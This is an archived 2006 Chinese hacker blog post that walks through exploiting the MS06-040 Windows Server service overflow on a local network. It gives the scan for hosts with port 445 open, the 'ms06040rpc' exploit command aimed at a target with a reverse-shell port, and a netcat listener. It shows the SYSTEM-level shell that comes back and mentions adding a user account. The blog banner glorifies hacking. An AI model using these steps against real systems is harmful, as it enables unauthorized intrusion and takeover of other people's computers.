网粥  

巡游五角大楼,登陆克里姆林宫,进出全球所有的计算机系统,摧毁全球金融秩序和重建新的世界格局,谁也阻挡不了我们的进攻,我们才是世界的主宰!
                                                                                                                          

                                             ------世界头号黑客:凯文米特尼克 

  • 日志:272
  • 评论:-23551
  • 留言:80
  • 访问:




MS06040漏洞利用动画(mika的那个溢出程序)
□雁飞 发表于 2006-10-19 2:27:00
信息来源:邪恶八进制信息安全团队(www.eviloctal.com
文章作者:fhod

首先我们在内网扫描开放了445端口的机器.
扫描这里我用superscan..

扫描这个网段所有开放了445的机器

172.28.51.1

之前我已经扫到过一个存在漏洞的机子了.
172.28.51.28就是这一个

ms06040rpc 172.28.51.28 172.28.51.223 1234 1

172.28.51.28是存在漏洞的主机. 172.28.51.223是我本机 1234是溢出反弹的端口 1为操作系统类型

<os type(1/2)>:
          1: win 2000sp4 2:win xpsp1


我们另开一个窗口
nc -l -v -p 1234

监听1234端口

然后来到另一个CMD


C:\>nc -l -v -p 1234
listening on [any] 1234 ...
connect to [172.28.51.223] from POSTRATOR [172.28.51.28] 1474
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>

看到这个就说明成功了..我们来看下权限

用户添加成功..系统权限..


完毕!!!!

后来我在测试的漏洞机netstat -an发现端口连接的是139..看下

172.28.51.28:139     172.28.51.223:1160   ESTABLISHED

139...我想扫描开放139端口也是可以溢出的..可以试一下..

bye~~~~~

MY BLOG:

http://www.ciker.org/



附件: ms06040利用.rar (2319 K)
阅读全文 | 回复(2) | 引用通告 | 编辑

Re:MS06040漏洞利用动画(mika的那个溢出程序)
少帅(游客)发表评论于2007-5-1 18:50:00
厉害啊
□个人主页 | 引用 | 返回 | 删除 | 回复

Re:MS06040漏洞利用动画(mika的那个溢出程序)
bftehrtu(游客)发表评论于2006-10-19 12:53:00
[flash=400,300]http://08966.com/123.swf [/flash]
□个人主页 | 引用 | 返回 | 删除 | 回复

发表评论:

    大名:
    密码: (游客无须输入密码)
    主页:
    标题:
Powered by Oblog.